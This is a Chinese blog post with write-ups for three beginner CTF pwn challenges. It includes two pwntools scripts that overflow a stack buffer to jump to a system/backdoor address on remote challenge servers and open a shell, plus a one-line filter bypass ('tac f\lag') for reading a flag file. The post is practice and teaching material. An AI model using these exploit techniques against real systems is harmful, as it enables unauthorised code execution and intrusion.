NSSCTF(PWN)14

于 2024-10-10 20:03:35 发布
阅读量418 收藏 3
点赞数 15
文章标签: 前端 linux javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142814885
版权

[NUSTCTF 2022 新生赛]ezPwn

发现是64位文件

main函数里直接有system,并且这里涉及了栈溢出

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','25580')
padding = b'a'*(0xa+0x8)
system = 0x401229
payload = padding + p64(system)
io.sendline(payload)
io.interactive()

得到flag

[FSCTF 2023]nc

一道签到题用

tac f\lag >&2

即可

[MoeCTF 2022]ret2text

发现是64位文件

看到了read典型栈溢出

发现有system和binsh

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','20864')
door = 0x4014c2
padding = b'a'*(0x40+0x8)
io.recvuntil(b'wish:')
payload = padding + p64(door)
io.sendline(payload)
io.interactive()

樊少泽
关注
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 761
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1736
这不是欺负老实人嘛~
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3509
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF(PWN)
fanshaoze的博客
09-28 362
题目标注nc签到题,我们在虚拟机里用nc,要输入su变成root,才能得到flag。
NSSCTF刷题笔记pwn7——[watevrCTF 2019]Voting Machine 1
qq_45692883的博客
02-02 460
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
NSSCTF(PWN)8
fanshaoze的博客
10-07 426
是32位文件main函数里发现了dofunc双击进入发现了read这里涉及了典型的栈溢出发现没有binsh只有system,我们可以把之前找到的buf双击点开发现bss当做binsh用,这题涉及到了shellcode注意这题的system里没有binsh要我们自己搭建一个binsh框架。
NSSCTF(PWN)10
fanshaoze的博客
10-08 382
这题是道签到题,直接nc但是cat flag得不到flag用这些得到flag。
NSSCTF(PWN)2
fanshaoze的博客
09-28 319
checksec看一下文件,发现是64位的查看main函数,有read涉及栈溢出,这里要打印一下name,整形数字要小于10,我们用到-1发现有system和binsh。
NSSCTF(PWN)12
fanshaoze的博客
10-09 434
查看发现是64位文件main函数中发现vuln,双击进入涉及了栈溢出且这道题是没有system和binsh的。
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1955
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[BUUCTF]Pwn刷题记录
x0r
10-13 245
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
PWN要点记录
m0_51246873的博客
09-23 128
PWN 要点
2023年SWPU NSS 秋季招新赛 (校外赛道) PWN 题解
2301_77205899的博客
10-24 310
food函数中输入数量 v1为int类型 可以为负数 只要输入一个较大的负数即可使money>10000。read函数 可以溢出 buf距离rbp0xa 但是read可以读入0x10000 后门函数已经给出。简单猜数字 不用脚本 先输入50 如果大了就再输入25小了就75 以此类推。直接利用pwntools写shellcode即可。然后利用泄露puts地址 得到libc基地址。/x00 绕过strlen检测。再执行以下函数door()exp python3语法。
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4352
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
前端的全栈混合之路Meteor篇(四):支持自定义对象序列化的EJSON介绍
分享有趣的、贴近生活的CS知识
10-07 845
在Meteor框架中,EJSON(Extended JSON)是一个扩展了标准JSON的库,旨在支持更多的数据类型。标准JSON仅支持字符串、数字、布尔值、数组和对象等基本数据类型,而EJSON允许开发者在Meteor应用中传输更复杂的数据类型,例如DateBinary数据,甚至是自定义对象,这使得Meteor在客户端和服务器之间传递复杂数据变得更加便捷和高效。
Vue根实例、实例总结
m0_54007573的博客
10-04 684
Vue根实例、实例总结
Javascript数组研究03_手写实现_fill_filter_find_findIndex_findLast_findLastIndex
qq_33546823的博客
10-03 1336
fill()方法用一个固定值填充一个数组中从起始索引(默认为 0)到终止索引(默认为)内的全部元素。它返回修改后的数组。输入参数value:用来填充数组元素的值。start(可选):开始填充的位置,默认值为 0,索引处理方法和copyWithin一致。end(可选):停止填充的位置(不包含该位置),默认值为,索引处理方法和copyWithin方法一致。输出:修改后的原数组。注意事项该方法会改变原数组,是修改方法。对于稀疏数组,空槽也会被value填充。是通用的方法在空数组上不会有任何处理。
前后分离项目记录
最新发布
qq_25806839的博客
10-10 179
打包报错 Thread Loader时,增加以下代码: 上线,打包prod时:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值